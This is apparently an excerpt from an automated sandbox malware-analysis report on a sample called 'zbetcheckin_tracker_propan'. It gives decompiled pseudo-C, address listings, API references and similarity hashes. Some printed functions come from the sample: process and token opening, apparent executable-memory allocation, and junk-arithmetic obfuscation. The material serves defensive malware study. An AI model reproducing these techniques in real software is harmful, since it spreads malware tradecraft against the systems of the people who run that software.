													_t419 = _t419 + 0xffff;
													__eflags = _t419;
													if(_t419 >= 0) {
														L71:
														__eflags = _v20 - 0x8000;
														if(_v20 > 0x8000) {
															L73:
															__eflags = _v18 - 0xffffffff;
															if(_v18 != 0xffffffff) {
																_t160 =  &_v18;
																 *_t160 = _v18 + 1;
																__eflags =  *_t160;
															} else {
																_v18 = _v18 & 0x00000000;
																__eflags = _v14 - 0xffffffff;
																if(_v14 != 0xffffffff) {
																	_v14 = _v14 + 1;
																} else {
																	_v14 = _v14 & 0x00000000;
																	__eflags = _v10 - 0xffff;
																	if(_v10 != 0xffff) {
																		_v10 = _v10 + 1;
																	} else {
																		_v10 = 0x8000;
																		_t419 = _t419 + 1;
																	}
																}
															}
															L80:
															__eflags = _t419 - 0x7fff;
															if(_t419 >= 0x7fff) {
																goto L82;
															}
															_v36 = _v18;
															_v34 = _v16;
															_v30 = _v12;
															_v26 = _t419 | _t492;
															goto L83;
														}
														__eflags = (_v20 & 0x0001ffff) - 0x18000;
														if((_v20 & 0x0001ffff) != 0x18000) {
															goto L80;
														}
														goto L73;
													}
													_t543 =  ~_t419 & 0x0000ffff;
													_v72 = _t543;
													_t419 = _t419 + _t543;
													__eflags = _t419;
													do {
														__eflags = _v20 & 0x00000001;
														if((_v20 & 0x00000001) != 0) {
															_t131 =  &_v76;
															 *_t131 = _v76 + 1;
															__eflags =  *_t131;
														}
														_v12 = _v12 >> 1;
														_t562 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
														_t582 = _v16 << 0x1f;
														_t139 =  &_v72;
														 *_t139 = _v72 - 1;
														__eflags =  *_t139;
														_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
														_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
													} while ( *_t139 != 0);
													__eflags = _v76;
													if(_v76 != 0) {
														_t144 =  &_v20;
														 *_t144 = _v20 | 0x00000001;
														__eflags =  *_t144;
													}
													goto L71;
												} else {
													goto L61;
												}
												while(1) {
													L61:
													__eflags = _v12 & 0x80000000;
													if((_v12 & 0x80000000) != 0) {
														break;
													}
													_t579 = _v16;
													_v20 = _v20 << 1;
													_t562 = _v16 + _t579 | _v20 >> 0x0000001f;
													_t582 = _v16 >> 0x1f;
													_t419 = _t419 + 0xffff;
													__eflags = _t419;
													_v16 = _v16 + _t579 | _v20 >> 0x0000001f;
													_v12 = _v12 + _v12 | _v16 >> 0x0000001f;
													if(_t419 > 0) {
														continue;
													}
													break;
												}
												__eflags = _t419;
												if(_t419 > 0) {
													goto L71;
												}
												goto L64;
											}
											_t560 = _v104;
											_t417 = _t417 + 1;
											__eflags =  *(_t560 + 8) & 0x7fffffff;
											if(( *(_t560 + 8) & 0x7fffffff) != 0) {
												goto L50;
											}
											__eflags =  *((intOrPtr*)(_t560 + 4)) - _t582;
											if( *((intOrPtr*)(_t560 + 4)) != _t582) {
												goto L50;
											}
											__eflags =  *_t560 - _t582;
											if( *_t560 != _t582) {
												goto L50;
											}
											_v28 = _t582;
											_v32 = _t582;
											_v36 = _t582;
											goto L83;
										}
										_t417 = _t417 + 1;
										__eflags = _v28 & 0x7fffffff;
										if((_v28 & 0x7fffffff) != 0) {
											goto L45;
										}
										__eflags = _v32;
										if(_v32 != 0) {
											goto L45;
										}
										__eflags = _v36;
										if(_v36 != 0) {
											goto L45;
										}
										_v26 = 0;
										goto L83;
									}
									_v28 = 0;
									_v32 = 0;
									_v36 = 0;
								}
								L83:
								__eflags = _t437;
							} while (_t437 != 0);
							_t376 = 0;
							__eflags = 0;
						}
						goto L85;
					}
					__eflags = _t582 - 0x80000000;
					 *_t433 = 1;
					if(_t582 != 0x80000000) {
						L11:
						__eflags = _t582 & 0x40000000;
						if((_t582 & 0x40000000) != 0) {
							L13:
							__eflags = _t449;
							if(_t449 == 0) {
								L17:
								__eflags = _t582 - 0x80000000;
								if(_t582 != 0x80000000) {
									L23:
									_push("1#QNAN");
									goto L24;
								}
								__eflags = _t562;
								if(_t562 != 0) {
									goto L23;
								} else {
									_push("1#INF");
									L20:
									_push(0x16);
									_push( &(_t433[1]));
									_t427 = E0040D0F8(_t499);
									_t582 = 0;
									__eflags = _t427;
									if(__eflags != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0040CA26(_t433, _t449, _t499, _t562, __eflags);
									}
									_t433[0] = 5;
									goto L27;
								}
							}
							__eflags = _t582 - 0xc0000000;
							if(_t582 != 0xc0000000) {
								goto L17;
							}
							__eflags = _t562;
							if(_t562 != 0) {
								goto L23;
							} else {
								_push("1#IND");
								goto L20;
							}
						} else {
							_push("1#SNAN");
							L24:
							_push(0x16);
							_push( &(_t433[1]));
							_t424 = E0040D0F8(_t499);
							_t582 = 0;
							__eflags = _t424;
							if(__eflags != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0040CA26(_t433, _t449, _t499, _t562, __eflags);
							}
							_t433[0] = 6;
							L27:
							_t386 = 0;
							goto L167;
						}
					}
					__eflags = _t562;
					if(_t562 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					 *_t433 =  *_t433 & _t562;
					_t433[0] = ((0x8000 | _t449 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
					_t433[0] = 1;
					_t433[1] = 0x30;
					_t433[1] = 0;
					L7:
					_t386 = 1;
					L167:
					return E0040FE9A(_t386, _t442, _v8 ^ _t605, _t499, _t562, _t582);
				}
			}

0x004151bf
0x004151c6
0x004151ca
0x004151d5
0x004151d6
0x004151d7
0x004151d9
0x004151e3
0x004151e5
0x004151ee
0x004151f1
0x004151f5
0x004151f9
0x004151fd
0x00415201
0x00415205
0x00415209
0x0041520d
0x00415211
0x00415215
0x00415219
0x0041521d
0x00415221
0x00415228
0x0041522b
0x00415233
0x0041522d
0x0041522d
0x0041522d
0x0041523a
0x0041523d
0x00415240
0x00415270
0x00415275
0x0041533c
0x00415342
0x00415345
0x0041534c
0x00415351
0x00415353
0x00415357
0x0041535a
0x0041535d
0x00415361
0x00415364
0x00415618
0x0041561b
0x0041561e
0x00415628
0x00415878
0x00415878
0x0041587c
0x0041587f
0x00415882
0x00415885
0x004158b9
0x004158bb
0x004158bc
0x004158bf
0x004158c1
0x004158c1
0x004158cc
0x004158cc
0x004158d2
0x004158d6
0x004158d7
0x004158e0
0x004158e8
0x004158f4
0x004158f4
0x004158f5
0x004158f8
0x004158f8
0x004158fd
0x004158ff
0x00415933
0x00415936
0x00415937
0x00415939
0x0041593c
0x0041593f
0x00415942
0x004159fd
0x004159fd
0x00415a00
0x00415a01
0x00415a03
0x00415a13
0x00415a13
0x00415a16
0x00000000
0x00000000
0x00415a0a
0x00415a0d
0x00000000
0x00000000
0x00415a0f
0x00415a12
0x00415a12
0x00415a12
0x00415a18
0x00415a1b
0x00415a1e
0x00415a20
0x00415a21
0x00415a21
0x00415a21
0x00415a24
0x00415a24
0x00415a26
0x00415a28
0x00415a28
0x00415a2e
0x00415a31
0x00415a36
0x00000000
0x00415a36
0x00415a05
0x00415a4e
0x00415a4e
0x00415a50
0x00000000
0x00000000
0x00415a48
0x00415a4b
0x00000000
0x00000000
0x00415a4d
0x00415a4d
0x00415a4d
0x00415a52
0x00415a54
0x00415a57
0x00000000
0x00000000
0x00415a59
0x00415a5d
0x00415a63
0x00415a72
0x00415a75
0x00415a78
0x00000000
0x00000000
0x00000000
0x00000000
0x00415948
0x00415948
0x0041594b
0x00415954
0x00415955
0x00415956
0x00415957
0x0041595d
0x00415966
0x0041597f
0x00415985
0x00415987
0x0041598a
0x0041598c
0x0041598f
0x00415991
0x00415997
0x00415997
0x0041599a
0x0041599c
0x0041599e
0x004159a5
0x004159a7
0x004159a7
0x004159a8
0x004159a8
0x004159aa
0x004159ac
0x004159ae
0x004159ae
0x004159ae
0x004159af
0x004159af
0x004159b2
0x004159b5
0x004159b7
0x004159ba
0x004159c0
0x004159c0
0x004159c0
0x00000000
0x004159c0
0x004159bc
0x004159be
0x00000000
0x00000000
0x00000000
0x004159be
0x004159a0
0x004159a3
0x00000000
0x00000000
0x00000000
0x004159a3
0x00415993
0x00415995
0x00000000
0x00000000
0x00000000
0x004159c1
0x004159c4
0x004159c9
0x004159ce
0x004159d1
0x004159d4
0x004159e4
0x004159e6
0x004159e8
0x004159e9
0x004159ec
0x004159f0
0x004159f3
0x004159f3
0x00000000
0x00415948
0x00415903
0x00415903
0x00415909
0x00000000
0x00000000
0x00000000
0x00000000
0x0041590b
0x0041590b
0x00415914
0x0041591c
0x00415928
0x00415929
0x0041592b
0x0041592e
0x0041592e
0x00000000
0x0041590b
0x0041588a
0x0041588d
0x00415890
0x00000000
0x00000000
0x00415892
0x00415896
0x0041589c
0x004158a9
0x004158ac
0x004158b0
0x00000000
0x004158b0
0x0041562e
0x00415631
0x00415634
0x0041563b
0x0041563d
0x0041563f
0x00415645
0x0041564b
0x0041564e
0x00415651
0x00415654
0x00415657
0x0041565a
0x0041585e
0x00415861
0x00415869
0x00415869
0x0041586f
0x00415872
0x00415872
0x00415875
0x00000000
0x00415875
0x00415660
0x00415663
0x00000000
0x00000000
0x00415669
0x0041566e
0x00000000
0x00000000
0x00415674
0x00415679
0x00415683
0x00415686
0x004156a5
0x004156a5
0x004156a8
0x004156be
0x004156be
0x004156be
0x004156be
0x004156c2
0x004156c5
0x004156cc
0x004156cf
0x004156d2
0x004156d4
0x004156d6
0x004156d9
0x00000000
0x00000000
0x004156e2
0x004156e5
0x004156e8
0x004156f4
0x004156f8
0x004156fb
0x004156fe
0x00415701
0x00415703
0x00415709
0x00415709
0x00000000
0x00415709
0x00415705
0x00415707
0x00000000
0x00000000
0x00000000
0x00415710
0x00415710
0x00415714
0x00415717
0x00415719
0x00415719
0x00415719
0x0041571c
0x00415720
0x00415724
0x00415727
0x00415727
0x0041572d
0x0041572e
0x0041572f
0x00415732
0x00415735
0x00415735
0x0041573b
0x00415741
0x00415743
0x00415746
0x00415784
0x00415784
0x0041578a
0x0041578d
0x004157d3
0x004157d3
0x004157d9
0x004157ec
0x004157ec
0x004157f0
0x0041581a
0x0041581a
0x0041581a
0x004157f2
0x004157f2
0x004157f6
0x004157f9
0x00415815
0x004157fb
0x004157fb
0x00415801
0x00415804
0x0041580f
0x00415806
0x00415806
0x0041580c
0x0041580c
0x00415804
0x004157f9
0x0041581d
0x0041581d
0x00415822
0x00415846
0x0041584d
0x00415853
0x00415855
0x00415858
0x00415824
0x00415827
0x0041582a
0x0041582d
0x00415835
0x00415835
0x0041583b
0x0041583b
0x0041583e
0x00000000
0x0041583e
0x004157e4
0x004157ea
0x00000000
0x00000000
0x00000000
0x004157ea
0x00415793
0x00415796
0x00415796
0x00415798
0x00415798
0x0041579c
0x0041579e
0x0041579e
0x0041579e
0x0041579e
0x004157aa
0x004157b2
0x004157b7
0x004157be
0x004157be
0x004157bf
0x004157c2
0x004157c2
0x004157c7
0x004157c9
0x004157cc
0x004157ce
0x004157ce
0x004157ce
0x004157ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00415748
0x00415748
0x00415748
0x0041574f
0x00000000
0x00000000
0x00415754
0x0041575a
0x00415762
0x00415767
0x0041576e
0x00415774
0x00415777
0x0041577a
0x0041577d
0x00000000
0x00000000
0x00000000
0x0041577d
0x0041577f
0x00415782
0x00000000
0x00000000
0x00000000
0x00415782
0x004156aa
0x004156ab
0x004156b2
0x00000000
0x00000000
0x004156b4
0x004156b7
0x00000000
0x00000000
0x004156b9
0x004156bc
0x00000000
0x00000000
0x00000000
0x004156bc
0x00415688
0x00415689
0x00415690
0x00000000
0x00000000
0x00415692
0x00415695
0x00000000
0x00000000
0x00415697
0x0041569a
0x00000000
0x00000000
0x0041569c
0x00000000
0x0041569c
0x0041567b
0x0041567b
0x00000000
0x0041567b
0x0041536a
0x00415371
0x00415373
0x00415376
0x00415376
0x00415379
0x0041537b
0x00415381
0x00415381
0x00415387
0x0041538a
0x0041538d
0x0041538f
0x00000000
0x00000000
0x00415398
0x0041539b
0x004153a0
0x004153a3
0x004153aa
0x004153ab
0x004153ac
0x004153af
0x004153b0
0x004153b0
0x004153b0
0x004153b3
0x004153b6
0x004153b6
0x004153b8
0x004153bc
0x004153c3
0x004153ca
0x004153cc
0x004153ce
0x004153d1
0x004153d4
0x004153d7
0x004153da
0x004153e0
0x004153e6
0x004153e9
0x004155f2
0x004155f5
0x004155f7
0x00415607
0x00415607
0x00415607
0x0041560b
0x004153ef
0x004153ef
0x004153f2
0x00000000
0x00000000
0x004153f8
0x004153fc
0x00000000
0x00000000
0x00415402
0x00415406
0x00415418
0x0041541a
0x0041541d
0x0041543c
0x0041543c
0x0041543f
0x00415465
0x00415465
0x00415468
0x0041546b
0x0041546e
0x00415475
0x00415478
0x0041547b
0x0041547d
0x0041547f
0x00415482
0x00000000
0x00000000
0x00415488
0x0041548e
0x0041548e
0x00415491
0x00415494
0x004154a0
0x004154a3
0x004154a6
0x004154aa
0x004154ad
0x004154af
0x004154b5
0x004154b5
0x00000000
0x004154b5
0x004154b1
0x004154b3
0x00000000
0x00000000
0x00000000
0x004154bc
0x004154bc
0x004154c0
0x004154c3
0x004154c6
0x004154c8
0x004154c8
0x004154c8
0x004154cb
0x004154cf
0x004154d3
0x004154d6
0x004154d6
0x004154dc
0x004154dd
0x004154de
0x004154e1
0x004154e4
0x004154e8
0x004154e8
0x004154ed
0x004154f2
0x004154f5
0x00415532
0x00415532
0x00415537
0x0041553a
0x00415584
0x00415584
0x0041558a
0x0041559d
0x0041559d
0x004155a1
0x004155cd
0x004155cd
0x004155cd
0x004155a3
0x004155a3
0x004155a7
0x004155ab
0x004155c8
0x004155ad
0x004155ad
0x004155b1
0x004155b7
0x004155c2
0x004155b9
0x004155b9
0x004155bf
0x004155bf
0x004155b7
0x004155ab
0x004155d0
0x004155d0
0x004155d4
0x00000000
0x00000000
0x004155da
0x004155e1
0x004155e9
0x004155ec
0x00000000
0x004155ec
0x00415595
0x0041559b
0x00000000
0x00000000
0x00000000
0x0041559b
0x00415540
0x00415543
0x00415546
0x00415546
0x00415548
0x00415548
0x0041554c
0x0041554e
0x0041554e
0x0041554e
0x0041554e
0x0041555a
0x00415562
0x00415567
0x0041556e
0x0041556e
0x0041556e
0x00415571
0x00415574
0x00415574
0x00415579
0x0041557d
0x0041557f
0x0041557f
0x0041557f
0x0041557f
0x00000000
0x00000000
0x00000000
0x00000000
0x004154f7
0x004154f7
0x004154f7
0x004154fe
0x00000000
0x00000000
0x00415503
0x00415509
0x00415511
0x00415516
0x0041551d
0x00415522
0x00415525
0x00415528
0x0041552b
0x00000000
0x00000000
0x00000000
0x0041552b
0x0041552d
0x00415530
0x00000000
0x00000000
0x00000000
0x00415530
0x00415441
0x00415444
0x00415445
0x0041544c
0x00000000
0x00000000
0x0041544e
0x00415451
0x00000000
0x00000000
0x00415453
0x00415455
0x00000000
0x00000000
0x00415457
0x0041545a
0x0041545d
0x00000000
0x0041545d
0x0041541f
0x00415420
0x00415427
0x00000000
0x00000000
0x00415429
0x0041542c
0x00000000
0x00000000
0x0041542e
0x00415431
0x00000000
0x00000000
0x00415433
0x00000000
0x00415433
0x0041540a
0x0041540d
0x00415410
0x00415410
0x0041560e
0x0041560e
0x0041560e
0x00415616
0x00415616
0x00415616
0x00000000
0x0041537b
0x00415280
0x00415282
0x00415287
0x0041528d
0x0041528d
0x00415293
0x0041529c
0x0041529c
0x0041529f
0x004152b4
0x004152b4
0x004152b6
0x004152e8
0x004152e8
0x00000000
0x004152e8
0x004152b8
0x004152ba
0x00000000
0x004152bc
0x004152bc
0x004152c1
0x004152c4
0x004152c6
0x004152c7
0x004152cf
0x004152d1
0x004152d3
0x004152d5
0x004152d6
0x004152d7
0x004152d8
0x004152d9
0x004152da
0x004152df
0x004152e2
0x00000000
0x004152e2
0x004152ba
0x004152a1
0x004152a7
0x00000000
0x00000000
0x004152a9
0x004152ab
0x00000000
0x004152ad
0x004152ad
0x00000000
0x004152ad
0x00415295
0x00415295
0x004152ed
0x004152f0
0x004152f2
0x004152f3
0x004152fb
0x004152fd
0x004152ff
0x00415301
0x00415302
0x00415303
0x00415304
0x00415305
0x00415306
0x0041530b
0x0041530e
0x00415312
0x00415312
0x00000000
0x00415312
0x00415293
0x00415289
0x0041528b
0x00000000
0x00000000
0x00000000
0x0041524a
0x0041524a
0x00415259
0x0041525c
0x00415260
0x00415264
0x00415268
0x0041526a
0x00415a39
0x00415a47
0x00415a47

Strings

1#SNAN, xrefs: 00415295
1#QNAN, xrefs: 004152E8
T, xrefs: 00415381
1#INF, xrefs: 004152BC
?, xrefs: 0041521D
1#IND, xrefs: 004152AD

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$T
API String ID: 2579439406-1230703744
Opcode ID: 0397ba9497dfe9a272f1a4ea60a6fb9a6a80abc0acaa5cf51831150090fa09ea
Instruction ID: 12636c6aad61654a31321d8f4daf5862cc437256b8386b6844a03c684cf31645
Opcode Fuzzy Hash: 0397ba9497dfe9a272f1a4ea60a6fb9a6a80abc0acaa5cf51831150090fa09ea
Instruction Fuzzy Hash: FB529E71D00A5ACBDF24CF98C4802EEB7B2FF94314F54826BC855AB385D7785982CB99

Function 002D4615, Relevance: 7.6, APIs: 5, Instructions: 81native

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,002D1F56), ref: 002D465C
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 002D466F
NtClose.NTDLL(00000000), ref: 002D46D1

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

memcpy.NTDLL(00000000,00000000,0000001C), ref: 002D46B5

Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021

NtClose.NTDLL(?), ref: 002D46C7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CloseHeapOpenProcess$AllocateFreeTokenmemcpy
String ID:
API String ID: 2190824854-0
Opcode ID: 4276a668cd0254d6ec7413a328b1bccc1982e4dad0e9b474e62d1055d120c967
Instruction ID: b8c03303290e4645f0c9e0c967a2c01f51494ab26572f5f0c88120217e21f09b
Opcode Fuzzy Hash: 4276a668cd0254d6ec7413a328b1bccc1982e4dad0e9b474e62d1055d120c967
Instruction Fuzzy Hash: 4C210572910229BBDB01AF95DC45EDEBFBDEB08741F104026F905F6260E7718A949FA1

Function 0040CA26, Relevance: 7.6, APIs: 5, Instructions: 65

C-Code - Quality: 76%

			E0040CA26(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
				void* __esi;
				signed int _t32;
				signed int _t33;
				intOrPtr _t34;
				int _t45;
				intOrPtr _t55;
				intOrPtr _t56;
				int _t57;
				intOrPtr _t58;
				signed int _t59;
				void* _t61;

				_t54 = __edi;
				_t53 = __edx;
				_t48 = __ebx;
				_t59 = _t61 - 0x2a8;
				_t32 =  *0x42c4a0; // 0xe190ffa3
				_t33 = _t32 ^ _t59;
				 *(_t59 + 0x2a4) = _t33;
				_push(_t55);
				 *(_t59 + 0x88) = _t33;
				 *((intOrPtr*)(_t59 + 0x84)) = __ecx;
				 *((intOrPtr*)(_t59 + 0x80)) = __edx;
				 *((intOrPtr*)(_t59 + 0x7c)) = __ebx;
				 *((intOrPtr*)(_t59 + 0x78)) = _t55;
				 *((intOrPtr*)(_t59 + 0x74)) = __edi;
				 *((intOrPtr*)(_t59 + 0xa0)) = ss;
				 *((intOrPtr*)(_t59 + 0x94)) = cs;
				 *((intOrPtr*)(_t59 + 0x70)) = ds;
				 *((intOrPtr*)(_t59 + 0x6c)) = es;
				 *((intOrPtr*)(_t59 + 0x68)) = fs;
				 *((intOrPtr*)(_t59 + 0x64)) = gs;
				asm("pushfd");
				_pop( *_t15);
				_t56 =  *((intOrPtr*)(_t59 + 0x2ac));
				_t34 = _t59 + 0x2ac;
				 *((intOrPtr*)(_t59 + 0x9c)) = _t34;
				 *((intOrPtr*)(_t59 - 0x28)) = 0x10001;
				 *((intOrPtr*)(_t59 + 0x90)) = _t56;
				 *((intOrPtr*)(_t59 + 0x8c)) =  *((intOrPtr*)(_t34 - 4));
				E0040FE20(__edi, _t59 - 0x80, 0, 0x50);
				 *(_t59 - 0x30) = _t59 - 0x80;
				 *(_t59 - 0x80) = 0xc000000d;
				 *((intOrPtr*)(_t59 - 0x74)) = _t56;
				 *((intOrPtr*)(_t59 - 0x2c)) = _t59 - 0x28;
				_t57 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter(_t59 - 0x30) == 0 && _t57 == 0) {
					_push(2);
					E0040FE17(_t43);
				}
				_t45 = TerminateProcess(GetCurrentProcess(), 0xc000000d);
				_pop(_t58);
				return E0040FE9A(_t45, _t48,  *(_t59 + 0x2a4) ^ _t59, _t53, _t54, _t58);
			}

0x0040ca26
0x0040ca26
0x0040ca26
0x0040ca27
0x0040ca34
0x0040ca39
0x0040ca3b
0x0040ca41
0x0040ca42
0x0040ca48
0x0040ca4e
0x0040ca54
0x0040ca57
0x0040ca5a
0x0040ca5d
0x0040ca64
0x0040ca6b
0x0040ca6f
0x0040ca73
0x0040ca77
0x0040ca7b
0x0040ca7c
0x0040ca82
0x0040ca88
0x0040ca8e
0x0040ca94
0x0040ca9b
0x0040caa6
0x0040cab2
0x0040caba
0x0040cac3
0x0040caca
0x0040cacd
0x0040cad8
0x0040cada
0x0040caec
0x0040caf2
0x0040caf4
0x0040caf9
0x0040cb06
0x0040cb14
0x0040cb21

APIs

IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 36c744ffb8da7f9432cb87508bd69c5e1121cf6253b0b6fdce0ed901ad6ebddc
Instruction ID: 8ef743d73e543d6174986831e481aa5c8385d2e57cb0c867346c0250616e2954
Opcode Fuzzy Hash: 36c744ffb8da7f9432cb87508bd69c5e1121cf6253b0b6fdce0ed901ad6ebddc
Instruction Fuzzy Hash: 1B21E4719113589FDB20DFA5D8897CDBBB8BF08304F10412AE909AB251EBB496458F59

Function 0040FE9A, Relevance: 7.6, APIs: 5, Instructions: 57

APIs

IsDebuggerPresent.KERNEL32 ref: 00412B08
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: cbeed38587537d900dccb379dc393c3de5331890d2107668f1d2024f85961387
Instruction ID: 311a2433788c888b2570000bb709f37abea71b1efbf1095dc2b51b401d63ab1f
Opcode Fuzzy Hash: cbeed38587537d900dccb379dc393c3de5331890d2107668f1d2024f85961387
Instruction Fuzzy Hash: A721D4B4500302AFC710DF19F985A897BB4FB08718F92A03AE409877B5E7B459858F5D

Function 004027AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29

C-Code - Quality: 58%

			E004027AD(void* __ecx, char _a4) {
				signed int _v8;
				char _v12;
				intOrPtr* _t12;
				long _t14;

				_t12 =  *0x40502c;
				_v8 = _v8 & 0x00000000;
				if(_t12 != 0) {
					_v8 = _v8 & 0x00000000;
					_t5 =  &_v12; // 0x402336
					_t7 =  &_a4; // 0x402336
					_v12 = 0x318;
					_t14 =  *_t12( *_t7,  &_v8, 0, _t5, 0x3000, 0x40);
					if(_t14 < 0) {
						SetLastError(RtlNtStatusToDosError(_t14));
						_v8 = _v8 & 0x00000000;
					}
				}
				return _v8;
			}

0x004027b2
0x004027b7
0x004027bd
0x004027bf
0x004027ca
0x004027d4
0x004027d7
0x004027de
0x004027e2
0x004027ec
0x004027f2
0x004027f2
0x004027e2
0x004027fa

APIs

RtlNtStatusToDosError.NTDLL ref: 004027E5
SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC

Strings

6#@, xrefs: 004027D4
6#@, xrefs: 004027CA, 004027CD

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Error$LastStatus
String ID: 6#@$6#@
API String ID: 4076355890-1222113149
Opcode ID: 53c7dc0b57a4ad390b981a2db64d8cbb6b77cf9fa09de91a4850e3f16a6c50e0
Instruction ID: 752d4f76ff22442f4c7c0650a08ed51d6ea4999d6a387b84b0daf2d8990a02ff
Opcode Fuzzy Hash: 53c7dc0b57a4ad390b981a2db64d8cbb6b77cf9fa09de91a4850e3f16a6c50e0
Instruction Fuzzy Hash: 34F0DAB1911209FBEB05CB95DE59B9E76BCAB14345F104058A700B61C0DBB4AB04DB68

Function 00401800, Relevance: 6.4, Strings: 5, Instructions: 111

C-Code - Quality: 100%

			E00401800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				char _v7;
				char _v17;
				short _v24;
				intOrPtr _v28;
				char _v33;
				char _v34;
				signed int _v48;
				intOrPtr _v52;
				short _v56;
				intOrPtr _v60;
				signed short _v76;
				intOrPtr _v80;
				signed short _v92;
				short _v96;
				signed char _v101;
				signed int _v112;
				char _v113;
				signed int _v120;
				char _v121;
				signed int _v140;
				signed int _v145;
				signed short _v152;
				signed int _v153;
				intOrPtr _v160;
				signed short _v172;
				intOrPtr _v176;
				intOrPtr _v188;
				intOrPtr _v196;
				signed short _v200;
				signed short _v208;
				intOrPtr _v220;
				char _v221;
				intOrPtr _t140;
				intOrPtr _t149;

				_v33 = 0x26;
				_v152 = 0xb;
				_v101 = 4;
				_v56 = 0x1d;
				_v96 = 0x2c;
				_v24 = 3;
				_v196 = 0x25;
				_v34 = 0x2c;
				_v220 = 0;
				while(_v220 < 0xf) {
					_v7 = _v140 - _v80 + _v48 + (_v172 & 0x0000ffff) - _v48;
					_v28 = 1 - _a12 - 0x16;
					_t149 =  *0x42d034; // 0x0
					_v121 = _v140 ^ 0x00000008 ^ _t149 + _a4 + (_v145 & 0x000000ff);
					_v221 = 0x63;
					_v5 = 0x00000056 - _a4 - (_v153 & 0x000000ff) +  *0x42d030 & 0x0000001a;
					_v220 = _v220 + 1;
				}
				 *0x42c020 = (_v145 & 0x000000ff) + (_v200 & 0x0000ffff) ^  *0x42c020;
				_v188 = (_v152 & 0x0000ffff) - _v120;
				_v176 = _v120 - 0x7f;
				_v208 = _v60 + _v140 - _v52 - 0x5b;
				_v120 = _v48 & 0x0000001d;
				_v17 = _v188 + _v120 - 0x00000031 ^ _v80 + _v160;
				_v153 = _v48 + _v140 - 0x00000035 + _a4 & _v112;
				_t140 =  *0x42d03c; // 0x0
				_v153 = _a12 + _a12 + _v160 ^ _t140 - _v160;
				_v24 = _v48 + 0x45;
				_v113 = _v48 + _v140 + _v140 - _v160 + _v80;
				_v208 = (_v208 & 0x0000ffff) - (_v101 & 0x000000ff) + _a8 + (_v92 & 0x0000ffff);
				_v76 = _v76 & 0x0000ffff & 0x0000001e - _a8 + _v120;
				return _v140;
			}

0x00401809
0x0040180d
0x00401816
0x0040181a
0x00401820
0x00401826
0x0040182c
0x00401836
0x0040183a
